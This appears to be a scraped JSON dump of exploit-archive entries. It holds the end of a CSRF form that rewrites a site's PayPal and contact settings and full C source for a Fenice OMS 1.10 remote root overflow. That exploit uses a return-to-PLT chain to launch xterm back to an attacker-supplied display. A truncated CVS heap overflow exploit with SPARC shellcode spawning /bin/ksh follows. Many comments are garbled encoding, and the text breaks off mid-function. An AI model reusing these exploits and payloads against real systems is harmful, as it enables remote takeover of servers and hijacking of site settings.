1337day.com\r\n\r\n\r\n<form name=\"frmCSet\" action=\"commonsettings.php\" method=\"get\">\r\n<input name=\"rbShowCount\" value=\"Y\" checked=\"\" type=\"hidden\">\r\n<input name=\"rbShowCount\" value=\"N\" type=\"hidden\">\r\n<input name=\"act\" id=\"act\" value=\"Update\" type=\"hidden\"></td>\r\n<input name=\"txtpaypal\" value=\"[email\u00a0protected]\" type=\"hidden\"></td>\r\n<input name=\"txtcheckout\" value=\"g0002\" type=\"hidden\">\r\n<input name=\"txtcontact\" value=\"[email\u00a0protected]\" type=\"hidden\"></td>\r\n<input name=\"btnUpdate\" class=\"button\" id=\"btnUpdate\" value=\"Save Settings\" type=\"submit\"> \r\n<input name=\"BtnCancel\" class=\"button\" id=\"BtnCancel\" value=\"Cancel\" onclick=\"cancel();\" type=\"hidden\"></td>\r\n</form>\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17942"}, {"lastseen": "2018-04-03T21:39:33", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2007-04-29T00:00:00", "published": "2007-04-29T00:00:00", "id": "1337DAY-ID-8911", "href": "https://0day.today/exploit/description/8911", "type": "zdt", "title": "Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)", "sourceData": "===================================================================\r\nFenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)\r\n===================================================================\r\n\r\n/*\r\n**\r\n** Fedora Core 6 (exec-shield) based\r\n** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\r\n** by Xpl017Elz\r\n**\r\n** Advanced exploitation in exec-shield (Fedora Core case study)\r\n** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt\r\n**\r\n** Reference: http://www.securityfocus.com/bid/17678\r\n** vendor: http://streaming.polito.it/legacy_server\r\n**\r\n** --\r\n** exploit by \"you dong-hun\"(Xpl017Elz), <[email\u00a0protected]>.\r\n** My World: http://x82.inetcop.org\r\n**\r\n*/\r\n/*\r\n** -=-= POINT! POINT! POINT! POINT! POINT! =-=-\r\n**\r\n** This is a very common standalone daemon remote buffer overflow vulnerability.\r\n** I used the method that I used on my proftpd exploit again to avoid random mapping library.\r\n** And I'm plainning to publish it in English.\r\n**\r\n** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt\r\n**\r\n** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more.\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n\r\n\r\n#define UNAME_PLT 0x8048e9c // <[email\u00a0protected]> // randomCI\u00c2\u00b0O mapping\u00c2\u00b5C?A (execle()>>16)&0xff GOT 1byte?\u00c2\u00a6 E\u00c2\u00ae??CI\u00c2\u00b1a A\u00c2\u00a7CO\r\n\r\n#define STRCPY_PLT 0x08048ffc // <[email\u00a0protected]>\r\n#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>: pop %ebx // retA\u00c2\u00bb ??CO AN 12byte AI\u00c2\u00b5? (nergal's idea)\r\n\r\n#define GETGID_GOT 0x8059234 // execle() CO?o AO?O?\u00c2\u00a6 AOAC\u00c2\u00b7I A\u00c2\u00b6COCI?\u00c2\u00a9 ?OA\u00c2\u00bb GOT AO?O\r\n/*\r\n\t(gdb) x/x 0x8059234\r\n\t0x8059234 <_GLOBAL_OFFSET_TABLE_+324>: 0x08049222\r\n\t(gdb) x 0x08049222\r\n\t0x8049222 <[email\u00a0protected]+6>: 0x00027068\r\n\t(gdb)\r\n*/\r\n#define GETGID_PLT\t0x0804921c // <[email\u00a0protected]> // GOT A\u00c2\u00b6CO AIEA, PLT?\u00c2\u00a6 AeCO execle() CO?o CU\u00c2\u00b5e?\u00c2\u00b5\r\n\r\n\r\n#define EXECLE_16_0xff\t0x8059156 // (execle()>>16)&0xff // uname CO?oAC 1byte: 0x!!0000\r\n#define EXECLE_08_0xff\t0x80591b5 // (execle()>>8)&0xff // bind CO?oAC 1byte: 0x00!!00\r\n#define EXECLE_00_0xff\t0x8048e83 // (execle()>>0)&0xff // ???OAo A\u00c2\u00a4AuAI 1byte: 0x0000!!\r\n\r\n\r\n/* A\u00c2\u00a4AuA?\u00c2\u00b7I A?\u00c2\u00b1U \u00c2\u00b0??ECN ?o?U\u00c2\u00b0? AOA\u00c2\u00bb \u00c2\u00b0??i, CE?a ?oA? */\r\n#define DATA_LOC 0x805af4c // heap ?o \u00c2\u00b0o\u00c2\u00b0?A\u00c2\u00bb AI?e\r\n\r\n\r\n/* /usr/X11R6/bin/xterm */\r\n#define ARG1_LOC\t0x805af4c // A\u00c2\u00b6CO\u00c2\u00b5E ?i\u00c2\u00b7E ?AAU AO?O (argv[0],argv[1]\u00c2\u00b7I ??AO)\r\n#define SLASH_STR\t0x8055acb // \"/\"\r\n#define XTERM_STR_1\t0x804875d // \"us\"\r\n#define XTERM_STR_2\t0x80585ce // \"r/\"\r\n#define X_STR_1\t\t0x8048df3 // \"X\"\r\n#define R_STR\t\t0x804a572 // \"R\"\r\n#define XTERM_STR_3\t0x804882c // \"bin\"\r\n#define X_STR_2\t\t0x8048e33 // \"x\"\r\n#define XTERM_STR_4\t0x8056a33 // \"term\"\r\n\r\n\r\n/* -display */\r\n#define ARG2_LOC\t0x805af61 // A\u00c2\u00b6CO\u00c2\u00b5E ?E?C ?AAU AO?O (argv[2]\u00c2\u00b7I ??AO)\r\n#define DISPLAY_OPTION\t0x80584b8 // \"-di\"\r\n\r\n\r\n/* xhost_ip:0 */\r\n#define ARG3_LOC\t0x805af65 // A\u00c2\u00b6CO\u00c2\u00b5E xhost IP ?AAU AO?O (argv[3]A?\u00c2\u00b7I ??AO)\r\n#define NUM_0\t\t0x8053285 // \"0\"\r\n#define NUM_1\t\t0x804ef17 // \"1\"\r\n#define NUM_2\t\t0x804b37b // \"2\"\r\n#define NUM_3\t\t0x804d622 // \"3\"\r\n#define NUM_4\t\t0x804e583 // \"4\"\r\n#define NUM_5\t\t0x80554d7 // \"5\"\r\n#define NUM_6\t\t0x8052341 // \"6\"\r\n#define NUM_7\t\t0x804d14a // \"7\"\r\n#define NUM_8\t\t0x8048db3 // \"8\"\r\n#define NUM_9\t\t0x80516bb // \"9\"\r\n\r\n\r\n#define COLON_STR 0x8057abb // \":\"\r\n#define NULL_STR 0x805afbe // 0x00000000\r\n\r\n\r\nint main(int argc,char *argv[]){\r\n\tint i=0,j=0;\r\n\tstruct hostent *se;\r\n\tstruct sockaddr_in saddr;\r\n\tunsigned long ip,ip1,ip2,ip3,ip4;\r\n\tunsigned char do_ex[4096];\r\n\tunsigned char xhost_ip[256];\r\n\tint sock;\r\n\tchar host[256];\r\n\tint port=554;\r\n\r\n\tmemset((char *)do_ex,0,sizeof(do_ex));\r\n\tip=ip1=ip2=ip3=ip4;\r\n\r\n\r\n\tprintf(\"/*\\n**\\n** Fedora Core 6 (exec-shield) based\\n\"\r\n\t\t\"** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\\n\"\r\n\t\t\"** by Xpl017Elz\\n**\\n\");\r\n\tif(argc<2){\r\n\t\tprintf(\"** Usage: %s [host] [port] [xhost ip]\\n\",argv[0]);\r\n\t\tprintf(\"**\\n** host: Fenice 1.10 Open Media Streaming Server\\n\");\r\n\t\tprintf(\"** port: default 554\\n\");\r\n\t\tprintf(\"** xhost ip: attacker xhost\\n**\\n\");\r\n\t\tprintf(\"** Example: %s fenice.omss.co.kr 554 82.82.82.82\\n**\\n*/\\n\",argv[0]);\r\n\t\texit(-1);\r\n\t}\r\n\telse {\r\n\t\tsscanf(argv[3],\"%d.%d.%d.%d\",&ip1,&ip2,&ip3,&ip4);\r\n#define IP1 16777216\r\n#define IP2 65536\r\n#define IP3 256\r\n\t\tip=0;\r\n\t\tip+=ip1 * (IP1);\r\n\t\tip+=ip2 * (IP2);\r\n\t\tip+=ip3 * (IP3);\r\n\t\tip+=ip4;\r\n\r\n\t\tmemset((char *)xhost_ip,0,256);\r\n\t\tsprintf(xhost_ip,\"%10lu\",ip);\r\n\t}\r\n\r\n\tmemset((char *)host,0,sizeof(host));\r\n\tstrncpy(host,argv[1],sizeof(host)-1);\r\n\tport=atoi(argv[2]);\r\n\r\n\tse=gethostbyname(host);\r\n\tif(se==NULL){\r\n\t\tprintf(\"** gethostbyname() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tsock=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sock==-1){\r\n\t\tprintf(\"** socket() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tsaddr.sin_family=AF_INET;\r\n\tsaddr.sin_port=htons(port);\r\n\tsaddr.sin_addr=*((struct in_addr *)se->h_addr);\r\n\tbzero(&(saddr.sin_zero),8);\r\n\r\n\r\n\tprintf(\"** make exploit\\n\");\r\n\tsprintf(do_ex,\"GET /\");\r\n\tj=strlen(do_ex);\r\n\tfor(i=0;i<320;i++,j++){\r\n\t\tsprintf(do_ex+j,\"A\");\r\n\t}\r\n\r\n#define __GOGOSSING(dest,index,src){\\\r\n\t*(long *)&dest[index]=src;\\\r\n\tindex+=4;\\\r\n}\r\n\r\n\t__GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT \u00c2\u00b0? A\u00c2\u00a4?o */\r\n\t// execle() AO?O A\u00c2\u00b6CO\r\n\t{\r\n\t\ti=0;\r\n\t\t/* (execle()>>0)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_00_0xff);\r\n\t\t/* (execle()>>8)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_08_0xff);\r\n\t\t/* (execle()>>16)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_16_0xff);\r\n\t}\r\n\t// argv[0],argv[1]: /usr/X11R6/bin/xterm\r\n\t{\r\n\t\ti=0;\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_1);\r\n\t\ti+=2; /* \"us\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_2);\r\n\t\ti+=2; /* \"r/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,X_STR_1);\r\n\t\ti+=1; /* \"X\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\ti+=1; /* \"1\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\ti+=1; /* \"1\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,R_STR);\r\n\t\ti+=1; /* \"R\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_6);\r\n\t\ti+=1; /* \"6\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_3);\r\n\t\ti+=3; /* \"bin\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,X_STR_2);\r\n\t\ti+=1; /* \"x\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_4);\r\n\t\ti+=4; /* \"term\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// argv[2]: -display\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,DISPLAY_OPTION);\r\n\t\ti+=3; /* \"-di\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// argv[3]: xhost_ip:0\r\n\tfor(ip=0;ip<10;ip++){\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\r\n\t\tswitch(xhost_ip[ip]){\r\n\t\t\tcase '0':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_0);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '1':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '2':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_2);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '3':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_3);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '4':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_4);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '5':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_5);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '6':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_6);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '7':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_7);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '8':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_8);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '9':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_9);\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t\ti+=1;\r\n\t}\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,COLON_STR);\r\n\t\ti+=1; /* \":\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_0);\r\n\t\ti+=1; /* \"0\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// exploit\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,GETGID_PLT); // getgidAC GOT?A execle() CO?o?\u00c2\u00a6 \u00c2\u00b0?Ao?C\u00c2\u00b7I, PLT\u00c2\u00b7I CU\u00c2\u00b5e?\u00c2\u00b5 \u00c2\u00b0??E.\r\n\t\t__GOGOSSING(do_ex,j,0x82828282); // callAI ???I?C\u00c2\u00b7I, AIAu CO?o %eip?\u00c2\u00a6 ?e?ACO?\u00c2\u00ad A\u00c2\u00a4?o.\r\n\t\t__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */\r\n\t\t__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */\r\n\t\t__GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */\r\n\t\t__GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */\r\n\t}\r\n\tprintf(\"** exploit size: %d\\n\",strlen(do_ex));\r\n\r\n\ti=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));\r\n\tif(i==-1){\r\n\t\tprintf(\"** connect() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\telse {\r\n\t\tprintf(\"** send exploit\\n\");\r\n\t\tsend(sock,do_ex,j,0);\r\n\r\n\t\tprintf(\"** sleepppppppp...\\n\");\r\n\t\tsleep(1);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t}\r\n\tclose(sock);\r\n\r\n\tprintf(\"** xhost, check it up, now!\\n**\\n*/\\n\");\r\n\texit(0);\r\n}\r\n\r\n/* eoc */\r\n\r\n\r\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8911"}, {"lastseen": "2018-01-05T03:15:42", "bulletinFamily": "exploit", "description": "Exploit for solaris platform in category remote exploits", "modified": "2004-06-25T00:00:00", "published": "2004-06-25T00:00:00", "id": "1337DAY-ID-8399", "href": "https://0day.today/exploit/description/8399", "type": "zdt", "title": "CVS Remote Entry Line Root Heap Overflow Exploit", "sourceData": "================================================\r\nCVS Remote Entry Line Root Heap Overflow Exploit\r\n================================================\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <signal.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <stdarg.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <sys/time.h>\r\n#include <fcntl.h>\r\n#include <zlib.h>\r\n\r\n#define CVS_PORT 2401\r\n#define RET 0xffbffd20\r\n#define NOP 0x82102017\r\n#define ROUND(s) if (s % word_size) s += (word_size - (s % word_size))\r\n\r\nunsigned char *root;\r\nunsigned char *user;\r\nunsigned char *pass;\r\nunsigned char *scrambled;\r\nunsigned char *reposit;\r\nunsigned char *directory;\r\nunsigned char buf[512];\r\nunsigned char *host;\r\nunsigned int rport, port;\r\nunsigned int target;\r\nz_stream zout;\r\nz_stream zin;\r\nunsigned char zbuf[65536 * 4];\r\nunsigned int zbufpos, zsent = 0;\r\nunsigned int word_size = 8, fill_size;\r\nunsigned int len1, len2, len3;\r\nunsigned int oflip, change, retaddr;\r\n\r\nchar entry1[64], entry2[64], entry3[64];\r\n\r\nstruct expl {\r\n char *name;\r\n unsigned int retadd;\r\n} serve[] = { \r\n{ \"cvs-1.11.1p1 - Solaris9 / SPARC\", 0xd4cc8},\r\n{ \"cvs-1.12.2 - Solaris9 / SPARC\", 0xd7ae8 + 8192},\r\n{ \"cvs-1.9.28 - Solaris 9 / SPARC\", 0xd25b8},\r\n{ \"Crash server\", 0x41414141}, \r\n{ \"Crash server 2\", 0x77777777}, \r\n{ \"Stack ret test\", 0xffbffd20},\r\n{ \"Heap ret test\", 0x00031337}, \r\n{ NULL, 0}\r\n};\r\n\r\nchar shellcode[]=\r\n \"\\x21\\x18\\xd8\\x58\" // sethi %hi(0x63616000), %l0\r\n \"\\xa0\\x14\\x23\\x61\" // or %l0, 0x361, %l0\r\n \"\\x90\\x10\\x20\\x01\" // mov 1, %o0\r\n \"\\x92\\x0b\\x80\\x0e\" // and %sp, %sp, %o1\r\n \"\\x94\\x10\\x20\\x04\" // mov 4, %o2\r\n \"\\x82\\x10\\x20\\x04\" // mov 4, %g1\r\n \"\\x91\\xd0\\x20\\x08\" // ta 8\r\n/* lsd shellcode. */ \r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode-4> */\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode> */\r\n \"\\x7f\\xff\\xff\\xff\" /* call <shellcode+4> */\r\n \"\\x90\\x03\\xe0\\x20\" /* add %o7,32,%o0 */\r\n \"\\x92\\x02\\x20\\x10\" /* add %o0,16,%o1 */\r\n \"\\xc0\\x22\\x20\\x08\" /* st %g0,[%o0+8] */\r\n \"\\xd0\\x22\\x20\\x10\" /* st %o0,[%o0+16] */\r\n \"\\xc0\\x22\\x20\\x14\" /* st %g0,[%o0+20] */\r\n \"\\x82\\x10\\x20\\x0b\" /* mov 0xb,%g1 */\r\n \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n \"/bin/ksh\";\r\n\r\nchar *scramble(char * str);\r\n\r\nvoid handler(int sig)\r\n{\r\n signal(SIGPIPE, handler);\r\n}\r\n\r\n/* \r\n * This function reads from socket s until either max bytes are read, \r\n * a newline is read, or timeout seconds elapse with no data over the \r\n * socket.\r\n * return values:\r\n * -2: timeout\r\n * -1: error\r\n * 0: connection closed\r\n * x: normal success, x bytes read\r\n */\r\nint timeout_read(int s, char *buf, int max, int timeout)\r\n{\r\n int total = 0;\r\n int r = 0;\r\n int s_flags;\r\n char c;\r\n struct timeval to;\r\n fd_set rset;\r\n \r\n memset(&to, '\\0', sizeof(to));\r\n to.tv_sec = timeout;\r\n to.tv_usec = 0;\r\n \r\n s_flags = fcntl(s, F_GETFL, 0);\r\n fcntl(s, F_SETFL, s_flags | O_NONBLOCK);\r\n\r\n while(total < max)\r\n {\r\nFD_ZERO(&rset);\r\nFD_SET(s, &rset);\r\nselect(s + 1, &rset, NULL, NULL, &to);\r\n\r\nif (FD_ISSET(s, &rset))\r\n{\r\n r = read(s, &c, 1);\r\n total += r;\r\n\r\n if(r == -1)\r\n {\r\nif (errno != EWOULDBLOCK)\r\n{\r\n fcntl(s, F_SETFL, s_flags);\r\n return -1;\r\n}\r\nelse\r\n continue;\r\n }\r\n else if(r == 0)\r\n {\r\nfcntl(s, F_SETFL, s_flags);\r\nreturn 0;\r\n }\r\n else /* r == 1 */\r\n {\r\nbuf[total-1] = c;\r\nif(c == '\\n')\r\n break;\r\n }\r\n \r\n}\r\nelse\r\n{\r\n fcntl(s, F_SETFL, s_flags);\r\n return -2;\r\n}\r\n }\r\n \r\n fcntl(s, F_SETFL, s_flags);\r\n return total; \r\n}\r\n\r\nvoid zflush(int sockfd)\r\n{\r\n static char outbuf[65536];\r\n\r\n zout.next_in = zbuf;\r\n zout.avail_in = zbufpos;\r\n\r\n do {\r\n zout.next_out = outbuf;\r\n zout.avail_out = sizeof(outbuf);\r\n if(deflate(&zout, Z_PARTIAL_FLUSH) == -1)\r\n {\r\nprintf(\"[--] Compression error.\\n\");\r\nexit(1);\r\n}\r\n zsent += sizeof(outbuf) - zout.avail_out;\r\n write(sockfd, outbuf, sizeof(outbuf) - zout.avail_out);\r\n } while (zout.avail_in != 0);\r\n\r\n zbufpos = 0;\r\n\r\n return;\r\n}\r\n\r\nint zwrite(char *buf, int len, int sockfd)\r\n{\r\n if ((sizeof(zbuf) - zbufpos) < (len))\r\n zflush(sockfd);\r\n\r\n memcpy(zbuf + zbufpos, buf, len);\r\n zbufpos += len;\r\n\r\n if (zbufpos >= sizeof(zbuf))\r\n {\r\nprintf(\"[--] zwrite compression error.\\n\");\r\nexit(1);\r\n }\r\n\r\n return (len);\r\n}\r\n\r\nint zgetch(int sockfd)\r\n{\r\n static char * outbuf = NULL;\r\n static int outpos = 0, outlen = 0;\r\n static char rcvbuf[32768];\r\n static char dbuf[4096];\r\n int got;\r\n\r\n retry:\r\n if (outpos < outlen && outlen)\r\n return outbuf[outpos++];\r\n free(outbuf);\r\n outlen = 0;\r\n outbuf = NULL;\r\n got = read(sockfd, rcvbuf, sizeof(rcvbuf));\r\n if (got <= 0)\r\n {\r\nprintf(\"[--] Socket error.\\n\");\r\nexit(1);\r\n }\r\n zin.next_in = rcvbuf;\r\n zin.avail_in = got;\r\n while (1)\r\n {\r\n int status, dlen;\r\n\r\n zin.next_out = dbuf;\r\n zin.avail_out = sizeof(dbuf);\r\n status = inflate(&zin, Z_PARTIAL_FLUSH);\r\n switch (status)\r\n {\r\n case Z_OK:\r\n outpos = 0;\r\n dlen = sizeof(dbuf) - zin.avail_out;\r\n outlen += dlen;\r\n outbuf = realloc(outbuf, outlen);\r\n memcpy(outbuf + outlen - dlen, dbuf, dlen);\r\n break;\r\n case Z_BUF_ERROR:\r\n goto retry;\r\n default:\r\n printf(\"[--] Revc inflate error.\\n\");\r\n }\r\n }\r\n}\r\n\r\nchar *zgets(int sockfd)\r\n{\r\n static char buf[32768];\r\n char * p = buf;\r\n int c;\r\n\r\n while (1)\r\n {\r\n c = zgetch(sockfd);\r\n if (c == '\\n')\r\n break;\r\n *p++ = c;\r\n if (p > buf + sizeof(buf))\r\n {\r\n p--;\r\n break;\r\n }\r\n }\r\n *p = 0;\r\n return (buf);\r\n}\r\n\r\nint do_compression(int s)\r\n{\r\nchar buf[3000];\r\nint term = 0, i = 0;\r\n\r\ndeflateInit(&zout, 1);\r\n inflateInit(&zin);\r\n\r\nmemset(buf, 0x0, 300);\r\nsprintf(buf, \"Gzip-stream 1\\n\");\r\n\r\nwrite(s, buf, strlen(buf));\r\n}\r\n\r\nint do_auth(int s)\r\n{\r\nchar* str = malloc(50000);\r\n if(str == 0)\r\n {\r\n perror(\"malloc\");\r\n exit(1);\r\n }\r\nstrcpy(str, \"BEGIN AUTH REQUEST\");\r\nstrncat(str, \"\\n\", 1);\r\nstrncat(str, reposit, strlen(reposit));\r\nstrncat(str, \"\\n\", 1);\r\nstrncat(str, user, strlen(user));\r\nstrncat(str, \"\\n\", 1);\r\nscrambled = scramble(pass);\r\nstrncat(str, scrambled, strlen(scrambled));\r\nstrncat(str, \"\\n\", 1);\r\nstrncat(str, \"END AUTH REQUEST\", 16);\r\nstrncat(str, \"\\n\", 1);\r\nwrite(s, str, strlen(str)); \r\nfree(str);\r\n\r\nreturn 0;\r\n}\r\n\r\nint do_root(int s)\r\n{\r\nchar* str = malloc(5000);\r\n\r\n bzero(str, 5000);\r\nstrncat(str, \"Root \", 5);\r\nstrncat(str, root, strlen(root));\r\nstrncat(str, \"\\n\", 1);\r\nwrite(s, str, strlen(str));\r\nfree(str);\r\n\r\nreturn 0;\r\n}\r\n\r\nint do_sized_entry(int s, char *e1, char *e2, int size)\r\n{\r\nchar *str = malloc(size * 2);\r\nchar *tmp = malloc(size); \r\nint x = 0;\r\nint term = 0;\r\n\r\nif(str == 0 || tmp == 0 || size < (strlen(e1) + strlen(e2) + 4))\r\n{\r\nreturn;\r\n}\r\n\r\nbzero(str, size*2);\r\nbzero(tmp, size);\r\nsprintf(tmp, \"Entry /%s/%s/\", e1, e2);\r\nstrcat(str, tmp);\r\nterm = strlen(str);\r\n\r\nx = term; \r\nwhile(x < (size - 1))\r\n str[x++] = 0xff;\r\n\r\nstrcat(str, 